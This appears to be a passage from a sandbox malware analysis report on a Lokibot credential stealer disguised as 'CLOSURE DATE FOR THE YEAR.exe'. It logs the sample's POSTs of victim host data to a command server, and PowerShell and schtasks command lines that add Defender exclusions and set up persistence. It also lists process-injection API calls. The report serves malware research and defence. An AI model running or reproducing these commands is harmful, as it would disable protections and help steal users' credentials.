Dec 4, 2024 06:53:57.398612022 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49941	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:57.656769991 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:57.777455091 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:59.245382071 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49946	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:59.500483036 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:59.620459080 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:54:01.080385923 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:54:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49950	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:54:01.369982958 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:54:01.491744995 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:54:02.961114883 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:54:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	00:51:56
Start date:	04/12/2024
Path:	C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
Imagebase:	0xb0000
File size:	630'792 bytes
MD5 hash:	17BF29A93776B4F6BE948802F652E6A9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:52:03
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
Imagebase:	0x9a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:52:03
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:52:03
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"
Imagebase:	0x9a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:52:03
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:52:03
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"
Imagebase:	0x400000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:52:03
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:52:04
Start date:	04/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xe50000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000008.00000002.2903142728.0000000001258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	00:52:05
Start date:	04/12/2024
Path:	C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe
Imagebase:	0x310000
File size:	630'792 bytes
MD5 hash:	17BF29A93776B4F6BE948802F652E6A9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:52:06
Start date:	04/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:52:12
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp"
Imagebase:	0x400000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:52:12
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:52:13
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8056 -s 1768
Imagebase:	0x210000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	42
Total number of Limit Nodes:	4

Executed Functions

Function 00790F40 Relevance: 3.9, Strings: 3, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R`J, xrefs: 00791035
Te^q, xrefs: 00790F5B
Te^q, xrefs: 007910B3

Memory Dump Source

Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID: R`J$Te^q$Te^q
API String ID: 0-383871421
Opcode ID: aafa8e3faadbe450dbe89109e4b99b21990d4b8bd4e4ea8f8948515cb5e2be91
Instruction ID: ff73707e045920c53585ad4fcb75665c479577d1f207809eea4a1b07a35b38a9
Opcode Fuzzy Hash: aafa8e3faadbe450dbe89109e4b99b21990d4b8bd4e4ea8f8948515cb5e2be91
Instruction Fuzzy Hash: 6641A371B10116CFDB04CFA9D98567EBBB6FF88700F20842AE505EB361CB799E058B91

Function 07AE0040 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

JSP, xrefs: 07AE022B

Memory Dump Source

Source File: 00000000.00000002.1758693923.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ae0000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID: JSP
API String ID: 0-2020610652
Opcode ID: 578e8e77cc2aeaf2ab099c68b659fa5254b3c65d56798831883569e3a4074970
Instruction ID: b6e86486eb663f167788181bf3f9904aa24c63c3dc534d7ab250b7cd5e2fc8b4
Opcode Fuzzy Hash: 578e8e77cc2aeaf2ab099c68b659fa5254b3c65d56798831883569e3a4074970
Instruction Fuzzy Hash: C5C1ABB17017068FEB29EB75C560B6FB7EAAFC9300F64446DD15A8B291DB78D802CB11

Function 00792370 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90f019796e5ae428cd918fe852b5f006761fc0ca75fd64cf4edddf46d7855f8
Instruction ID: a69ba6e6b2be1f54ddf62856c129c49cbc3eb8179336d29a4817f82e5f9a1eb6
Opcode Fuzzy Hash: a90f019796e5ae428cd918fe852b5f006761fc0ca75fd64cf4edddf46d7855f8
Instruction Fuzzy Hash: 7971F571704201DFCB84DF28E5809297BA5AF95300BA28566D806EF263D73CED42DB96

Function 0738BD61 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f701abd5945cb08a952712d41e15767a2a8195e22cc9cbaff2d329f09774dab6
Instruction ID: b4d02f5f587ebda60755589d2af5b210cedfac5cdb523f868e8e3e626f8207a8
Opcode Fuzzy Hash: f701abd5945cb08a952712d41e15767a2a8195e22cc9cbaff2d329f09774dab6
Instruction Fuzzy Hash: AC4115F4D1A30ADFEB44EFAAE5443EDFBBDAF8A300F14A02AD409A2251D7385445CB40

Function 0738B274 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0738B4B6

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0ce000971ae79d2e3927e740a37447f6d1d50a2474921baded6ceb386e3dbeec
Instruction ID: b4f705cfd43b8e5814b28dc4ac5a8d83083ef5f6d3a233fcd8535b2588ec0b8c
Opcode Fuzzy Hash: 0ce000971ae79d2e3927e740a37447f6d1d50a2474921baded6ceb386e3dbeec
Instruction Fuzzy Hash: EBA14BB1D0031ADFEB54DF68C8417AEFBB2AF48310F1485AAE848A7250D7759985CF92

Function 0738B280 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0738B4B6

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 308ab823071658de16fdf76914e60cf7400f59babed102977c1295811b8f6fd5
Instruction ID: 5ee3cc88f2add57a49a3c097795bc137b905280d2a697b414c9844725197d709
Opcode Fuzzy Hash: 308ab823071658de16fdf76914e60cf7400f59babed102977c1295811b8f6fd5
Instruction Fuzzy Hash: D79149F1D0031ACFEB50DF68C84179EFBB2AF48314F1485AAE858A7250DB759985CF92

Function 00798EFC Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00798FB9

Memory Dump Source

Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f084f68a8d36398f603a87c43d923a725314ec446706539547ed38ee5d89c054
Instruction ID: 73936b2c677cf86594f33baf6b945ad472c79b959b35a8422f4decbe7856c177
Opcode Fuzzy Hash: f084f68a8d36398f603a87c43d923a725314ec446706539547ed38ee5d89c054
Instruction Fuzzy Hash: 3A4102B0C00719CEDF24CFA9D844BDEBBB6BF49304F20806AE508AB255DB766945CF91

Function 0738AEB6 Relevance: 1.6, APIs: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0738F6E5

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 69e2f5aacf3c5123cffa673c64a3cdd3911310a28eb12fa0502cf4927dc75e66
Instruction ID: 5fcb22699641fc55d91c626bcc1394414b315ae6fe54f68b892713abc82a57b6
Opcode Fuzzy Hash: 69e2f5aacf3c5123cffa673c64a3cdd3911310a28eb12fa0502cf4927dc75e66
Instruction Fuzzy Hash: 584123B580034A9FDB20EF9AC449BDEFBF8EB48324F20855AD559A7210D374A544CFA5

Function 00797A8C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00798FB9

Memory Dump Source

Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 523ce52dc85bab558276b606a47d7f1fab3030777b508e36062ae2ee53e5ec06
Instruction ID: 315572d3c1588ca52c56cfdeb5ce17c36e3bf07f637ce909d126972d5c553e68
Opcode Fuzzy Hash: 523ce52dc85bab558276b606a47d7f1fab3030777b508e36062ae2ee53e5ec06
Instruction Fuzzy Hash: B541F0B0C00719DFDF24CFA9C844B9EBBB6BF49304F20806AE408AB255DB756945CF91

Function 0738ABF0 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0738AC88

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3d374a19c7b444ed92d39747bf4947d6edcffdaa8c6e33eabcd30c9585f16e03
Instruction ID: 61b0c884e0a5d65f29a8667c7ab0b5b1028318ee5417daf72d99399b2780efe0
Opcode Fuzzy Hash: 3d374a19c7b444ed92d39747bf4947d6edcffdaa8c6e33eabcd30c9585f16e03
Instruction Fuzzy Hash: 3B2153B19003599FDB10DFA9C881BEEBBF0FF88310F10842AE958A7350C7789944CBA4

Function 0738ABF8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0738AC88

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f48ef9bc1c0184d1d7f647222800b6767637232e4fd072ebe60b056b013b67cb
Instruction ID: f61916ab0be1383af86eb15324999d58f5a9b1856cd40575046d67d60505734b
Opcode Fuzzy Hash: f48ef9bc1c0184d1d7f647222800b6767637232e4fd072ebe60b056b013b67cb
Instruction Fuzzy Hash: 5E2155B19003599FDB10DFA9C880BDEBBF5FF48310F10842AE958A7340D7789954CBA5

Function 0738A620 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0738A6A6

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ba4669381df35eb7af0b90a16b86371fd3376b4a8d110217648f4358f98f3ef2
Instruction ID: 4e9c67ccda7d75445a3c1c68b437e706dd0a7120b408e954e3517cb22faf4b99
Opcode Fuzzy Hash: ba4669381df35eb7af0b90a16b86371fd3376b4a8d110217648f4358f98f3ef2
Instruction Fuzzy Hash: 892134B19003098FDB10DFA9C4857EEBBF4AF88324F10842ED459A7240C7789945CFA5

Function 0738ACE0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0738AD68

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
